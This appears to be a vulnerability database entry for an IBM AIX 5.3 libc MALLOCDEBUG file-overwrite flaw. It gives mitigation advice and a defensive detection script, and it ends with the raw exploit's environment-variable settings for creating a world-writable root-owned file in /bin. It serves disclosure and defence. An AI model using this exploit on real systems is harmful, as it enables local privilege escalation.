Vendor: AIX
By: Affix
CVSS: 7.2 (HIGH)
Type: File Overwrite
CWE: 264
Product Name: AIX
Affected Version From: AIX 5.3 ML 5
Affected Version To: AIX 5.3 ML 5
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: IBM AIX
2009

IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability

AIX 5.3 ML 5 is vulnerable to a file overwrite because of faulty libc code added at that maintenance level. With umask 000 and the environment variables MALLOCTYPE=debug and MALLOCDEBUG=report_allocations,output:/bin/filename set, running any setuid root binary creates /bin/filename with 777 permissions.

Mitigation:

Update to the latest version of AIX 5.3 ML 5 or later.
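
A detection-side check for the condition described above, as an added example that is not part of the original advisory or exploit: it flags the MALLOCTYPE/MALLOCDEBUG combination in a captured environment listing and lists world-writable files in a directory. The PROTECTED_DIRS list, the "PID VAR=value ..." dump format and all function names are assumptions made for this example.

```shell
#!/bin/sh
# Assumptions: PROTECTED_DIRS and the "PID VAR=value ..." dump format.
PROTECTED_DIRS="/bin /usr/bin /sbin /usr/sbin /etc /usr/ccs/lib"

# Constructed sample input (not real process data).
SAMPLE_ENV_DUMP='101 PATH=/usr/bin MALLOCTYPE=debug MALLOCDEBUG=report_allocations,output:/bin/filename
102 PATH=/usr/bin MALLOCTYPE=debug MALLOCDEBUG=report_allocations'

# Print the path given to the output: option of a MALLOCDEBUG value
# (comma-separated options, as in the advisory's example value).
mallocdebug_output_path() {
    printf '%s\n' "$1" | tr ',' '\n' | sed -n 's/^output://p' | head -n 1
}

# Succeed when MALLOCTYPE=debug is combined with an output: path that
# lies under one of PROTECTED_DIRS.
is_risky_malloc_env() {
    [ "$1" = "debug" ] || return 1
    out=$(mallocdebug_output_path "$2")
    [ -n "$out" ] || return 1
    for dir in $PROTECTED_DIRS; do
        case "$out" in "$dir"/*) return 0 ;; esac
    done
    return 1
}

# Read "PID VAR=value ..." lines on stdin and print the PIDs whose
# environment carries the risky combination.
scan_env_dump() {
    while read -r pid rest; do
        mtype=""; mdebug=""
        for kv in $rest; do
            case "$kv" in
                MALLOCTYPE=*)  mtype=${kv#MALLOCTYPE=} ;;
                MALLOCDEBUG=*) mdebug=${kv#MALLOCDEBUG=} ;;
            esac
        done
        if is_risky_malloc_env "$mtype" "$mdebug"; then echo "$pid"; fi
    done
}

# List world-writable regular files under a directory; the artifact the
# advisory describes is a mode-777 file in /bin.
find_world_writable() {
    find "$1" -type f -perm -0002 -print 2>/dev/null | sort
}
```

Feed scan_env_dump with printf '%s\n' "$SAMPLE_ENV_DUMP" to see the flagged PID, and run find_world_writable against each system directory being audited.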

Exploit-DB raw data:

#!/bin/bash
#################################################################
#		      _______ _________ _       						#
#		     (  ____ )\__   __/( (    /|						#
#		     | (    )|   ) (   |  \  ( |						#
#		     | (____)|   | |   |   \ | |						#
#		     |     __)   | |   | (\ \) |						#
#		     | (\ (      | |   | | \   |						#
#		     | ) \ \__   | |   | )  \  |						#
#		     |/   \__/   )_(   |/    )_)						#
#                        http://root-the.net 					#
#################################################################
#[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability		#
#[+] Refer : securitytracker.com/id?1022261                     #
#[+] Exploit : Affix <root@root-the.net>						#
#[+] Tested on : IBM AIX										#
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead,  #
#	      str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull	#
# AIX 5.3 ML 5 is where this bad libc code was added.			#
# Libs Affected :												#
#	/usr/ccs/lib/libc.a											#
#	/usr/ccs/lib/libp/libc.a									#
#################################################################

# Set the following environment variables:

umask 000
MALLOCTYPE=debug
MALLOCDEBUG=report_allocations,output:/bin/filename

echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions."

# milw0rm.com [2009-07-30]